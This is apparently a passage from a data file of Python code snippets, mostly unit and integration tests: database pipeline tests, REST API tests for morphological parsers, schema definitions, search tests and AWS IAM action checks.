self.extra_environ_admin)\n resp = json.loads(response.body)\n new_backup_count = Session.query(MorphologicalParserBackup).count()\n datetime_modified = resp['datetime_modified']\n morphological_parser_count = new_morphological_parser_count\n new_morphological_parser_count = Session.query(MorphologicalParser).count()\n assert morphological_parser_count == new_morphological_parser_count\n assert resp['description'] == u'Newer description'\n assert response.content_type == 'application/json'\n assert original_backup_count + 1 == new_backup_count\n backup = Session.query(MorphologicalParserBackup).filter(\n MorphologicalParserBackup.UUID==unicode(\n resp['UUID'])).order_by(\n desc(MorphologicalParserBackup.id)).first()\n assert backup.datetime_modified.isoformat() == our_morphological_parser_datetime_modified.isoformat()\n assert backup.description == u'New description'\n assert response.content_type == 'application/json'\n\n # Tests that GET /morphologicalparsers//id/history returns the morphological parser with id=id and its previous incarnations.\n\n morphological_parser_1_backup_count = Session.query(MorphologicalParserBackup).count() # there should only be backups of parser #1\n morphological_parsers = Session.query(MorphologicalParser).all()\n morphological_parser_1_id = morphological_parsers[0].id\n morphological_parser_1_UUID = morphological_parsers[0].UUID\n\n # Now get the history of the first morphological parser (which was updated twice in ``test_update``.\n response = self.app.get(\n url(controller='morphologicalparsers', action='history', id=morphological_parser_1_id),\n headers=self.json_headers, extra_environ=self.extra_environ_view_appset)\n resp = json.loads(response.body)\n assert response.content_type == 'application/json'\n assert 'morphological_parser' in resp\n assert 'previous_versions' in resp\n assert len(resp['previous_versions']) == morphological_parser_1_backup_count\n\n # Get the same history as above, except use the UUID\n response = self.app.get(\n url(controller='morphologicalparsers', action='history', id=morphological_parser_1_UUID),\n headers=self.json_headers, extra_environ=self.extra_environ_view_appset)\n resp = json.loads(response.body)\n assert response.content_type == 'application/json'\n assert 'morphological_parser' in resp\n assert 'previous_versions' in resp\n assert len(resp['previous_versions']) == morphological_parser_1_backup_count\n\n # Attempt to get the history with an invalid id and expect to fail\n response = self.app.get(\n url(controller='morphologicalparsers', action='history', id=123456789),\n headers=self.json_headers, extra_environ=self.extra_environ_view_appset, status=404)\n resp = json.loads(response.body)\n assert response.content_type == 'application/json'\n assert resp['error'] == u'No morphological parsers or morphological parser backups match 123456789'\n\n # Test servecompiled\n response = self.app.get(url(controller='morphologicalparsers', action='servecompiled',\n id=morphological_parser_1_id), headers=self.json_headers, extra_environ=self.extra_environ_admin)\n binary_path = os.path.join(morphological_parser_1_dir, 'morphophonology.foma')\n binary_file = open(binary_path, 'rb').read()\n binary_file_from_resp = response.body\n assert binary_file == binary_file_from_resp\n\n # Test export\n response = self.app.get(url(controller='morphologicalparsers', action='export',\n id=morphological_parser_1_id), headers=self.json_headers, extra_environ=self.extra_environ_admin)\n assert response.content_type == 'application/zip'\n # To ensure the exported parser works, unzip it and test it out: ./parse.py chiens chats\n\n parser_1_cache = sorted([p.transcription for p in Session.query(model.Parse).\\\n filter(model.Parse.parser_id==morphological_parser_1_id).all()])\n assert parser_1_cache == [u'abc', u'chiens', u'tombait']\n\n # Test morphological parser deletion.\n assert u'morphophonology.script' in os.listdir(morphological_parser_1_dir)\n assert u'morphophonology.foma' in os.listdir(morphological_parser_1_dir)\n response = self.app.delete(url('morphologicalparser', id=morphological_parser_1_id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n assert not os.path.exists(morphological_parser_1_dir)\n assert resp['description'] == u'Newer description'\n assert resp['phonology']['id'] == morphological_parser_1_phonology_id", "def test_documents_for(self):\n # Test the default ES version\n self._test_documents_for(_documents_for)\n\n # Test the DB version\n self._test_documents_for(_db_documents_for)", "def test_primary_keys_headers(sdc_builder, sdc_executor, database):\n if not database.is_ct_enabled:\n pytest.skip('Test only runs against SQL Server with CT enabled.')\n\n pipeline = None\n table_name = get_random_string(string.ascii_lowercase, 20)\n connection = database.engine.connect()\n\n try:\n logger.info('Creating source table %s in %s database ...', table_name, database.type)\n table = sqlalchemy.Table(\n table_name,\n sqlalchemy.MetaData(database.engine),\n sqlalchemy.Column('name', sqlalchemy.String(64), primary_key=True),\n sqlalchemy.Column('pokedex_id', sqlalchemy.Integer, primary_key=True),\n sqlalchemy.Column('type', sqlalchemy.String(64)),\n sqlalchemy.Column('generation', sqlalchemy.Integer)\n )\n table.create(database.engine)\n\n # Create the pipeline\n pipeline_builder = sdc_builder.get_pipeline_builder()\n sql_server_change_tracking = pipeline_builder.add_stage('SQL Server Change Tracking Client')\n sql_server_change_tracking.set_attributes(\n table_configs=[{\n 'initialOffset': 0,\n 'schema': 'dbo',\n 'tablePattern': f'{table_name}'\n }]\n )\n wiretap = pipeline_builder.add_wiretap()\n sql_server_change_tracking >> wiretap.destination\n\n pipeline = pipeline_builder.build(\"SQL Server CT Pipeline\").configure_for_environment(database)\n sdc_executor.add_pipeline(pipeline)\n connection = database.engine.connect()\n # enable change tracking on table\n connection.execute(f'ALTER TABLE {table_name} ENABLE change_tracking WITH (track_columns_updated = on)')\n\n sdc_executor.start_pipeline(pipeline)\n\n # Define the data for each statement\n initial_data = {'name': 'Azurill', 'pokedex_id': 298, 'type': 'Normal', 'generation': 3}\n updated_data = {'name': 'Azurill', 'pokedex_id': 298, 'type': 'Normal/Fairy', 'generation': 6}\n\n # Insert some data and update it\n connection.execute(f\"\"\"\n insert into {table_name}\n values (\n '{initial_data.get(\"name\")}',\n {initial_data.get(\"pokedex_id\")},\n '{initial_data.get(\"type\")}',\n {initial_data.get(\"generation\")}\n )\n \"\"\")\n\n # In order to ensure all changes are tracked, a pause is added between changes so no record is lost\n sleep(5)\n\n connection.execute(f\"\"\"\n update {table_name}\n set type = '{updated_data.get(\"type\")}', generation = {updated_data.get(\"generation\")}\n where name = '{updated_data.get(\"name\")}' and pokedex_id = {updated_data.get(\"pokedex_id\")}\n \"\"\")\n\n sleep(5)\n\n connection.execute(f\"delete from {table_name}\")\n\n sdc_executor.wait_for_pipeline_metric(pipeline, 'input_record_count', 3)\n assert len(wiretap.output_records) == 3\n\n primary_key_before_prefix = \"jdbc.primaryKey.before.\"\n primary_key_after_prefix = \"jdbc.primaryKey.after.\"\n\n for index in range(0, 3):\n header_values = wiretap.output_records[index].header.values\n\n assert primary_key_before_prefix + \"type\" not in header_values\n assert primary_key_before_prefix + \"generation\" not in header_values\n assert primary_key_after_prefix + \"type\" not in header_values\n assert primary_key_after_prefix + \"generation\" not in header_values\n\n if index == 1:\n assert header_values['sdc.operation.type'] == '3'\n assert header_values['jdbc.SYS_CHANGE_OPERATION'] == 'U'\n\n assert primary_key_before_prefix + \"name\" in header_values\n assert primary_key_before_prefix + \"pokedex_id\" in header_values\n assert primary_key_after_prefix + \"name\" in header_values\n assert primary_key_after_prefix + \"pokedex_id\" in header_values\n\n assert header_values[primary_key_before_prefix + \"name\"] is not None\n assert header_values[primary_key_before_prefix + \"pokedex_id\"] is not None\n assert header_values[primary_key_after_prefix + \"name\"] is not None\n assert header_values[primary_key_after_prefix + \"pokedex_id\"] is not None\n\n assert header_values[f\"{primary_key_before_prefix}name\"] == initial_data.get(\"name\")\n assert header_values[f\"{primary_key_before_prefix}pokedex_id\"] == f'{initial_data.get(\"pokedex_id\")}'\n assert header_values[f\"{primary_key_after_prefix}name\"] == updated_data.get(\"name\")\n assert header_values[f\"{primary_key_after_prefix}pokedex_id\"] == f'{updated_data.get(\"pokedex_id\")}'\n else:\n if index == 0:\n assert header_values['sdc.operation.type'] == '1'\n assert header_values['jdbc.SYS_CHANGE_OPERATION'] == 'I'\n else:\n assert header_values['sdc.operation.type'] == '2'\n assert header_values['jdbc.SYS_CHANGE_OPERATION'] == 'D'\n\n assert primary_key_before_prefix + \"name\" not in header_values\n assert primary_key_before_prefix + \"pokedex_id\" not in header_values\n assert primary_key_after_prefix + \"name\" not in header_values\n assert primary_key_after_prefix + \"pokedex_id\" not in header_values\n\n finally:\n logger.info('Dropping table %s in %s database...', table_name, database.type)\n connection.execute(f'drop table if exists {table_name}')\n\n if pipeline and (sdc_executor.get_pipeline_status(pipeline).response.json().get('status') == 'RUNNING'):\n sdc_executor.stop_pipeline(pipeline)", "def __init__(self, db,\n relevant_classes=DocumentClass.default_relevant_set,\n load_titles=True,\n load_classifications=True,\n overwrite=False,\n allow_doc_dups=True):\n\n logger.info( \"Life-sci relevant classes: {}\".format(relevant_classes) )\n logger.info( \"Duplicate docs allowed? {}\".format(allow_doc_dups) )\n\n self.db = db\n self.relevant_classes = relevant_classes\n self.load_titles = load_titles\n self.load_classifications = load_classifications\n self.overwrite = overwrite\n self.allow_document_dups = allow_doc_dups\n\n self.relevant_regex = re.compile( '|'.join(relevant_classes) )\n\n self.metadata = MetaData()\n self.doc_id_map = dict()\n self.existing_chemicals = set()\n\n # This SQL Alchemy schema is a very useful programmatic tool for manipulating and querying the SureChEMBL data.\n # It's mostly used for testing, except for document insertion where 'inserted_primary_key' is used to\n # avoid costly querying of document IDs\n\n self.docs = Table('schembl_document', self.metadata,\n Column('id', Integer, Sequence('schembl_document_id'), primary_key=True),\n Column('scpn', String(50), unique=True),\n Column('published', Date()),\n Column('life_sci_relevant', SmallInteger()),\n Column('assign_applic', String(1000)), \n Column('family_id', Integer))\n\n self.titles = Table('schembl_document_title', self.metadata,\n Column('schembl_doc_id', Integer, ForeignKey('schembl_document.id'), primary_key=True),\n Column('lang', String(10), primary_key=True),\n Column('text', Text()))\n\n self.classes = Table('schembl_document_class', self.metadata,\n Column('schembl_doc_id', Integer, ForeignKey('schembl_document.id'), primary_key=True),\n Column('class', String(100), primary_key=True),\n Column('system', SmallInteger(), primary_key=True))\n\n self.chemicals = Table('schembl_chemical', self.metadata,\n Column('id', Integer, primary_key=True),\n Column('mol_weight', Float()),\n Column('logp', Float()),\n Column('med_chem_alert', SmallInteger()),\n Column('is_relevant', SmallInteger()),\n Column('donor_count', SmallInteger()),\n Column('acceptor_count', SmallInteger()),\n Column('ring_count', SmallInteger()),\n Column('rot_bond_count', SmallInteger()),\n Column('corpus_count', Integer()))\n\n self.chem_structures = Table('schembl_chemical_structure', self.metadata,\n Column('schembl_chem_id', Integer, ForeignKey('schembl_chemical.id'), primary_key=True),\n Column('smiles', Text()),\n Column('std_inchi', Text()),\n Column('std_inchikey', String(27)))\n\n self.chem_mapping = Table('schembl_document_chemistry', self.metadata,\n Column('schembl_doc_id', Integer, ForeignKey('schembl_document.id'), primary_key=True),\n Column('schembl_chem_id', Integer, ForeignKey('schembl_chemical.id'), primary_key=True),\n Column('field', SmallInteger, primary_key=True),\n Column('frequency', Integer))\n\n # Define types for chemical structure inserts\n if (\"cx_oracle\" in str(db.dialect)):\n logger.info( \"cx_oracle dialect detected, setting CLOB input types for structure INSERT statements.\"\\\n \" (required for long strings inserted as part of executemany operations)\" )\n import cx_Oracle\n self.chem_struc_types = (None, cx_Oracle.CLOB, cx_Oracle.CLOB, None)\n else:\n self.chem_struc_types = None", "def data_quality_check(spark, input_data):\n\n # check part of star_schema, number of rows and columns of tables in ops folder \n star_schema_tables = ['immigrations_table', \n 'date_table', \n 'cities_table', \n 'states_table', \n 'us_state_temperatures_table', \n 'country_temperatures_table']\n found_tables = []\n\n path = os.path.join(input_data, 'ops')\n table_names = [y for x, y, z in os.walk(path)][0]\n subdirs = glob.glob(path + '/*/')\n df_check = {}\n for name, path in zip(table_names, subdirs):\n # check part of schema\n if name not in star_schema_tables:\n raise ValueError(f'Table {name} not known from star schema.')\n # load table from parquet\n df_check[name] = spark.read.parquet(path)\n logging.info(f'Dataframe <{name}> successfully loaded.')\n # count rows and columns\n rows_count = df_check[name].count()\n cols_count = len(df_check[name].columns)\n if rows_count < 1:\n raise ValueError(f'Data quality check failed! <{name}> contains 0 rows.')\n if cols_count < 2:\n raise ValueError(f'Data quality check failed! <{name}> contains 0 columns.')\n logging.info(f'Data Quality Checks passed successfully. <{name}> contains <{rows_count}> rows and <{cols_count}> columns.\\n')\n found_tables.append(name)\n\n # sorting both the lists \n star_schema_tables.sort() \n found_tables.sort() \n # check part of star schema \n if star_schema_tables != found_tables:\n raise ValueError('Tables not identical to star schema.')\n logging.info('All tables from star schema exist.')", "def run_tests():\n source1 = TextModel('CS111 Syllabus')\n source1.add_file('CS111_Syllabus.txt')\n\n source2 = TextModel('AR Syllabus')\n source2.add_file('AR_Syllabus.txt')\n\n new1 = TextModel('WR120 Syllabus')\n new1.add_file('WR120_Syllabus.txt')\n new1.classify(source1, source2)\n \n new2 = TextModel('CS131 Syllabus')\n new2.add_file('CS131_Syllabus.txt')\n new2.classify(source1, source2)\n \n new3 = TextModel('My Paper 2 for WR120')\n new3.add_file('WR_Paper_2.txt')\n new3.classify(source1, source2)\n \n new4 = TextModel('CS111 PS9PR0')\n new4.add_file('ps9pr0.txt')\n new4.classify(source1, source2)", "def test_create_doc(self):\r\n function_name = sys._getframe().f_code.co_name\r\n db_name = \"{}_{}\".format(function_name, \"db\")\r\n db_name_illegal_by_rdb = \"{}_{}\".format(\r\n db_name,\r\n self.ILLEGAL_BY_RDB\r\n )\r\n db_name_illegal_by_this_program = \"{}_{}\".format(\r\n db_name,\r\n self.ILLEGAL_BY_THIS_PROGRAM\r\n )\r\n table_name = \"{}_{}\".format(function_name, \"table\")\r\n table_name_illegal_by_rdb = \"{}_{}\".format(\r\n table_name,\r\n self.ILLEGAL_BY_RDB\r\n )\r\n table_name_illegal_by_this_program = \"{}_{}\".format(\r\n table_name,\r\n self.ILLEGAL_BY_THIS_PROGRAM\r\n )\r\n doc_1 = {\"name\": \"alpha\", \"no\":\"1\"}\r\n doc_2 = {\"name\": \"beta\", \"no\":\"2\"}\r\n doc_3 = {\"name\": \"charlie\", \"no\":\"1\"}\r\n doc_4 = {\"name\": \"charlie\", \"no\":\"3\"}\r\n\r\n test_list_1 = [\r\n db_name,\r\n table_name,\r\n doc_1,\r\n [\"no\"],\r\n False,\r\n None,\r\n None,\r\n False\r\n ]\r\n test_list_2 = [\r\n test_list_1[0],\r\n test_list_1[1],\r\n doc_2,\r\n [\"no\"],\r\n None\r\n ]\r\n test_list_3 = [\r\n test_list_1[0],\r\n test_list_1[1],\r\n doc_3,\r\n [\"no\"],\r\n None\r\n ]\r\n test_list_4 = [\r\n test_list_1[0],\r\n test_list_1[1],\r\n doc_4,\r\n [\"name\", \"no\"],\r\n None\r\n ]\r\n test_list_5 = [\r\n db_name_illegal_by_rdb,\r\n table_name_illegal_by_rdb,\r\n doc_1,\r\n None\r\n ]\r\n test_list_6 = [\r\n db_name_illegal_by_rdb,\r\n table_name_illegal_by_this_program,\r\n doc_1,\r\n None\r\n ]\r\n test_list_7 = [\r\n db_name_illegal_by_this_program,\r\n table_name_illegal_by_rdb,\r\n doc_1,\r\n None\r\n ]\r\n test_list_8 = [\r\n db_name_illegal_by_this_program,\r\n table_name_illegal_by_this_program,\r\n doc_1,\r\n None\r\n ]\r\n\r\n crd(self.c, test_list_1[0])\r\n crt(self.c, test_list_1[1], test_list_1[0])\r\n test_list_1[len(test_list_1) - 1] = isinstance(\r\n crdoc(\r\n self.c,\r\n test_list_1[2],\r\n test_list_1[1],\r\n test_list_1[0],\r\n _expr=True\r\n ),\r\n r.ast.Insert\r\n )\r\n test_list_1[len(test_list_1) - 2] = crdoc(\r\n self.c,\r\n test_list_1[2],\r\n test_list_1[1],\r\n test_list_1[0]\r\n )\r\n test_list_1[len(test_list_1) - 3] = crdoc(\r\n self.c,\r\n test_list_1[2],\r\n test_list_1[1],\r\n test_list_1[0],\r\n test_list_1[3]\r\n )\r\n test_list_1[len(test_list_1) - 4] = isinstance(\r\n crdoc(\r\n self.c,\r\n test_list_1[2],\r\n test_list_1[1],\r\n test_list_1[0],\r\n [\"name\", \"no\"],\r\n True\r\n ),\r\n r.ast.Insert\r\n )\r\n test_list_2[len(test_list_2) - 1] = crdoc(\r\n self.c,\r\n test_list_2[2],\r\n test_list_2[1],\r\n test_list_2[0],\r\n test_list_2[3]\r\n )\r\n crt(self.c, test_list_3[1], test_list_3[0])\r\n test_list_3[len(test_list_3) - 1] = crdoc(\r\n self.c,\r\n test_list_3[2],\r\n test_list_3[1],\r\n test_list_3[0],\r\n test_list_3[3]\r\n )\r\n test_list_4[len(test_list_4) - 1] = crdoc(\r\n self.c,\r\n test_list_4[2],\r\n test_list_4[1],\r\n test_list_4[0],\r\n test_list_4[3]\r\n )\r\n dd(self.c, test_list_1[0])\r\n\r\n \"\"\"Test 1.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_5[len(test_list_5) - 1] = crdoc(\r\n self.c,\r\n test_list_5[2],\r\n test_list_5[1],\r\n test_list_5[0]\r\n )\r\n\r\n \"\"\"Test 2.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_6[len(test_list_6) - 1] = crdoc(\r\n self.c,\r\n test_list_6[2],\r\n test_list_6[1],\r\n test_list_6[0]\r\n )\r\n\r\n r.db_create(test_list_7[0]).run(self.c)\r\n \"\"\"Test 3.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_7[len(test_list_7) - 1] = crdoc(\r\n self.c,\r\n test_list_7[2],\r\n test_list_7[1],\r\n test_list_7[0]\r\n )\r\n r.db_drop(test_list_7[0]).run(self.c)\r\n\r\n r.db_create(test_list_8[0]).run(self.c)\r\n r.db(test_list_8[0]).table_create(test_list_8[0]).run(self.c)\r\n \"\"\"Test 4.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_8[len(test_list_8) - 1] = crdoc(\r\n self.c,\r\n test_list_8[2],\r\n test_list_8[1],\r\n test_list_8[0]\r\n )\r\n r.db_drop(test_list_8[0]).run(self.c)\r\n\r\n self.assertTrue(test_list_1[len(test_list_1) - 1]) # Test 5.\r\n self.assertIsNotNone(test_list_1[len(test_list_1) - 2]) # Test 6.\r\n self.assertIsNone(test_list_1[len(test_list_1) - 3]) # Test 7.\r\n self.assertFalse(test_list_1[len(test_list_1) - 4]) # Test 8\r\n self.assertIsNotNone(test_list_2[len(test_list_2) - 1]) # Test 9.\r\n self.assertIsNone(test_list_3[len(test_list_3) - 1]) # Test 10.\r\n self.assertIsNotNone(test_list_4[len(test_list_4) - 1]) # Test 11.\r\n self.assertIsNone(test_list_5[len(test_list_5) - 1]) # Test 12.\r\n self.assertIsNone(test_list_6[len(test_list_6) - 1]) # Test 13.\r\n self.assertIsNone(test_list_7[len(test_list_7) - 1]) # Test 14.\r\n self.assertIsNone(test_list_8[len(test_list_8) - 1]) # Test 15.\r", "def test_number_of_concepts(self):\n \n _log.info('-'*80)\n \n # arrange \n dump_file = getInputFile(\"wikidump_Knowledge_Love_War.xml\")\n parsed_file = getOutputFile(\"wikidump_Knowledge_Love_War.parsed.xml\")\n \n # act\n wn.parse_dump(dump_file, parsed_file)\n db_wrapper = wn.build_database_wrapper(parsed_file, StopWordsStemmer([]))\n \n titles_count =len(db_wrapper.title_index)\n concepts_count =len(db_wrapper.concepts_index)\n \n # assert\n self.assertEqual(titles_count, 3, \"number of tiltes should be 3, got {0}\".format(titles_count)) \n self.assertEqual(concepts_count, 3, \"number of tiltes should be 3, got {0}\".format(concepts_count))", "def test_type_code(self):\n inv_search = \"collection:review\"\n spi_search = \"find tc review\"\n self._compare_searches(inv_search, spi_search)\n inv_search = \"collection:review\"\n spi_search = \"find ps review\"\n self._compare_searches(inv_search, spi_search)\n inv_search = \"collection:review\"\n spi_search = \"find scl review\"\n self._compare_searches(inv_search, spi_search)", "def test_short_words_are_removed(self):\n dataset_1 = factories.SourceDatasetFactory.create(\n i_dbgap_description='lorem ipsum',\n source_study_version__study=self.study\n )\n dataset_2 = factories.SourceDatasetFactory.create(\n i_dbgap_description='lorem ipsum',\n source_study_version__study=self.study\n )\n response = self.client.get(self.get_url(self.study.pk), {'description': 'lorem ip'})\n context = response.context\n self.assertIn('form', context)\n self.assertTrue(context['has_results'])\n self.assertIsInstance(context['results_table'], tables.SourceDatasetTableFull)\n self.assertEqual(len(context['results_table'].rows), 2)\n self.assertIn(dataset_1, context['results_table'].data)\n self.assertIn(dataset_2, context['results_table'].data)", "def test_match_table_post(self):\n pass", "def test_sql_server_cdc_with_specific_capture_instance_name(sdc_builder, sdc_executor, database):\n\n try:\n schema_name = DEFAULT_SCHEMA_NAME\n tables = []\n no_of_records = 5\n no_of_tables = 3\n target_table_index = 2\n rows_in_database = setup_sample_data(no_of_tables * no_of_records)\n\n # setup the tables first\n for index in range(0, no_of_tables):\n table_name = get_random_string(string.ascii_lowercase, 20)\n # split the rows_in_database into no_of_records for each table\n # e.g. for no_of_records=5, the first table inserts rows_in_database[0:5]\n # and the secord table inserts rows_in_database[5:10]\n table = setup_table(database, schema_name, table_name,\n rows_in_database[(index*no_of_records): ((index+1)*no_of_records)])\n tables.append(table)\n\n if (index == target_table_index):\n capture_instance_name = f'{schema_name}_{table_name}'\n\n target_rows = rows_in_database[target_table_index * no_of_records: (target_table_index + 1) * no_of_records]\n\n pipeline_builder = sdc_builder.get_pipeline_builder()\n sql_server_cdc = pipeline_builder.add_stage('SQL Server CDC Client')\n sql_server_cdc.set_attributes(table_configuration=[{'capture_instance': capture_instance_name}])\n\n dest_table_name = get_random_string(string.ascii_uppercase, 9)\n\n dest_table = create_table(database, DEFAULT_SCHEMA_NAME, dest_table_name)\n tables.append(dest_table)\n jdbc_producer = pipeline_builder.add_stage('JDBC Producer')\n\n jdbc_producer.set_attributes(schema_name=DEFAULT_SCHEMA_NAME,\n table_name_template=dest_table_name,\n default_operation='INSERT',\n field_to_column_mapping=[])\n\n pipeline_finisher_executor = pipeline_builder.add_stage('Pipeline Finisher Executor')\n\n sql_server_cdc >= pipeline_finisher_executor\n sql_server_cdc >> jdbc_producer\n pipeline = pipeline_builder.build().configure_for_environment(database)\n sdc_executor.add_pipeline(pipeline)\n\n # wait for data captured by cdc jobs in sql server before starting the pipeline\n ct_table_name = f'{capture_instance_name}_CT'\n wait_for_data_in_ct_table(ct_table_name, no_of_records, database)\n\n sdc_executor.start_pipeline(pipeline).wait_for_finished()\n\n assert_table_replicated(database, target_rows, DEFAULT_SCHEMA_NAME, dest_table_name)\n\n finally:\n for table in tables:\n logger.info('Dropping table %s in %s database...', table, database.type)\n table.drop(database.engine)", "def test_create_self_subject_rules_review_for_all_namespaces(self):\n pass", "def test_create_subject_rules_review_for_all_namespaces(self):\n pass", "def test_figure2(self):\n\n encoder = TctColBertQueryEncoder('castorini/tct_colbert-msmarco')\n searcher = SimpleDenseSearcher.from_prebuilt_index('msmarco-passage-tct_colbert-hnsw', encoder)\n hits = searcher.search('what is a lobster roll')\n\n self.assertAlmostEqual(hits[0].score, 70.53741, delta=0.0001)\n self.assertEqual(hits[0].docid, '7157710')\n\n self.assertAlmostEqual(hits[9].score, 69.01737, delta=0.0001)\n self.assertEqual(hits[9].docid, '2920399')\n\n self.assertEqual(len(hits), 10)", "def preprocess(args, dataset, process_splits=('train', 'dev', 'test'), print_aggregated_stats=False, verbose=False):\n text_tokenize, program_tokenize, post_process, table_utils = tok.get_tokenizers(args)\n parsed_programs = load_parsed_sqls(args, augment_with_wikisql=args.augment_with_wikisql)\n num_parsed_programs = len(parsed_programs)\n\n vocabs = load_vocabs(args)\n\n schema_graphs = dataset['schema']\n schema_graphs.lexicalize_graphs(\n tokenize=text_tokenize, normalized=(args.model_id in [VASE, SQLOVA, RATSQL]))\n\n # 32 dbs, 119 table pairs contain ambiguities\n # num_ambs = 0\n # amb_dbs = set()\n # for db_name in schema_graphs.db_index:\n # schema_graph = schema_graphs[db_name]\n # for key in schema_graph.foreign_key_index:\n # if len(schema_graph.foreign_key_index[key]) > 1:\n # print(schema_graph.get_table(key[0]).name, schema_graph.get_table(key[1]).name)\n # for i, (f1, f2) in enumerate(schema_graph.foreign_key_index[key]):\n # print('Key pair {}: {}, {}'.format(i, schema_graph.get_field(f1).name,\n # schema_graph.get_field(f2).name))\n # amb_dbs.add(schema_graph.base_name)\n # num_ambs += 1\n # print('{} foreign key ambiguities'.format(num_ambs))\n # print('Foreign key ambiguity detected in {} databases'.format(len(amb_dbs)))\n # import pdb\n # pdb.set_trace()\n\n ############################\n # data statistics\n num_oov = 0\n num_examples = 0\n num_denormalization_failed = 0\n num_schema_truncated = 0\n num_picklist_matched = []\n max_ptr_span_size = 0\n num_text_tokens, num_input_tokens, num_cm_tokens, num_cm_wf_tokens = [], [], [], []\n ############################\n\n # parallel data\n for split in process_splits:\n if not split in dataset:\n print(f\"{split} split not in dataset...\")\n continue\n stats = preprocess_split(dataset, split, args, parsed_programs,\n text_tokenize, program_tokenize, post_process, table_utils,\n schema_graphs, vocabs, verbose=verbose)\n ############################\n # update data statistics\n num_oov_split = stats[0]\n num_denormalization_failed_split = stats[1]\n num_schema_truncated_split = stats[2]\n num_picklist_matched_split = stats[3]\n max_ptr_span_size_split = stats[4]\n num_text_tokens_split, num_input_tokens_split, num_cm_tokens_split, num_cm_wf_tokens_split = stats[5:]\n num_oov += num_oov_split\n num_examples += len(dataset[split])\n num_denormalization_failed += num_denormalization_failed_split\n num_schema_truncated += num_schema_truncated_split\n num_picklist_matched += num_picklist_matched_split\n if max_ptr_span_size_split > max_ptr_span_size:\n max_ptr_span_size = max_ptr_span_size_split\n num_text_tokens += num_text_tokens_split\n num_input_tokens += num_input_tokens_split\n num_cm_tokens += num_cm_tokens_split\n num_cm_wf_tokens += num_cm_wf_tokens_split\n ############################\n\n # if len(parsed_programs) > num_parsed_programs:\n # save_parsed_sqls(args, parsed_programs)\n\n #FORCE SAVE THE PARSES\n parsed_json = os.path.join(args.data_dir, '{}.parsed.json'.format(args.dataset_name))\n if not os.path.exists(parsed_json):\n print(f\"* save the parsed sqls !!! \")\n save_parsed_sqls(args, parsed_programs)\n\n\n if print_aggregated_stats:\n print_data_statistics(num_oov, num_examples, num_denormalization_failed, num_schema_truncated,\n max_ptr_span_size, num_text_tokens, num_input_tokens, num_cm_tokens, num_cm_wf_tokens)\n\n out_pkl = get_processed_data_path(args)\n with open(out_pkl, 'wb') as o_f:\n pickle.dump(dataset, o_f)\n print('Processed data dumped to {}'.format(out_pkl))", "def test_clinical(self):\n self.c.execute(\"\"\"select sampleName from clinical_test order by sampleName\"\"\")\n rows = self.c.fetchall()\n self.assertEqual(len(rows), 5) # five samples\n self.assertEqual(rows[0][0], 'sample1') # sample name is sample1\n self.assertEqual(rows[1][0], 'sample4')\n self.assertEqual(rows[2][0], 'sample17')\n self.assertEqual(rows[3][0], 'sample63')\n self.assertEqual(rows[4][0], 'sample101')", "def test_spotdb_reader(spotdb_data):\n\n db = spotdb_data\n\n reader = SpotDBReader(db)\n gfs = reader.read()\n\n assert len(gfs) == 4\n\n metrics = {\"Total time (inc)\", \"Avg time/rank (inc)\"}\n\n assert len(gfs[0].dataframe) > 2\n assert gfs[0].default_metric == \"Total time (inc)\"\n assert metrics < set(gfs[0].dataframe.columns)\n assert metrics < set(gfs[3].dataframe.columns)\n\n assert \"launchdate\" in gfs[0].metadata.keys()", "def assert_es_equals_db():\n # Wait for ES to be available\n current_search.flush_and_refresh('relationships')\n\n # Fetch all DB objects and all ES objects\n es_q = list(RecordsSearch(index='relationships').query().scan())\n db_q = GroupRelationship.query.all()\n\n # normalize and compare two sets\n es_norm_q = list(map(normalize_es_result, es_q))\n db_norm_q = list(map(normalize_db_result, db_q))\n assert set(es_norm_q) == set(db_norm_q)", "def test_find_2018_cais_name_table32():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 32\n\n found_in_table_32, expected_in_table_32 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_32 == expected_in_table_32", "def test_other_iam_data_fixes_in_GH_393(self):\n # Cassandra: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonkeyspacesforapachecassandra.html\n results = get_actions_for_service(\"cassandra\")\n self.assertTrue(\"cassandra:Restore\" in results)\n # Comprehend Medical: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncomprehendmedical.html\n results = get_actions_for_service(\"comprehendmedical\")\n # print(results)\n actions = [\n \"comprehendmedical:DescribeEntitiesDetectionV2Job\",\n \"comprehendmedical:DescribeICD10CMInferenceJob\",\n \"comprehendmedical:DescribePHIDetectionJob\",\n \"comprehendmedical:DescribeRxNormInferenceJob\",\n # \"comprehendmedical:DescribeSNOMEDCTInferenceJob\", # Not in SAR\n \"comprehendmedical:DetectEntitiesV2\",\n \"comprehendmedical:InferICD10CM\",\n \"comprehendmedical:InferRxNorm\",\n # \"comprehendmedical:InferSNOMEDCT\", # Not in SAR\n \"comprehendmedical:ListEntitiesDetectionV2Jobs\",\n \"comprehendmedical:ListICD10CMInferenceJobs\",\n \"comprehendmedical:ListPHIDetectionJobs\",\n \"comprehendmedical:ListRxNormInferenceJobs\",\n # \"comprehendmedical:ListSNOMEDCTInferenceJobs\", # Not in SAR\n \"comprehendmedical:StartEntitiesDetectionV2Job\",\n \"comprehendmedical:StartICD10CMInferenceJob\",\n \"comprehendmedical:StartPHIDetectionJob\",\n \"comprehendmedical:StartRxNormInferenceJob\",\n \"comprehendmedical:StopEntitiesDetectionV2Job\",\n \"comprehendmedical:StopICD10CMInferenceJob\",\n ]\n for action in actions:\n # if action not in results:\n # print(action)\n self.assertTrue(action in results)\n # Compute Optimizer\n results = get_actions_for_service(\"compute-optimizer\")\n actions = [\n \"compute-optimizer:DeleteRecommendationPreferences\",\n \"compute-optimizer:ExportEBSVolumeRecommendations\",\n \"compute-optimizer:ExportLambdaFunctionRecommendations\",\n \"compute-optimizer:GetEffectiveRecommendationPreferences\",\n \"compute-optimizer:GetEnrollmentStatusesForOrganization\",\n \"compute-optimizer:GetLambdaFunctionRecommendations\",\n \"compute-optimizer:GetRecommendationPreferences\",\n \"compute-optimizer:PutRecommendationPreferences\",\n ]\n for action in actions:\n self.assertTrue(action in results)\n # DataSync\n results = get_actions_for_service(\"datasync\")\n actions 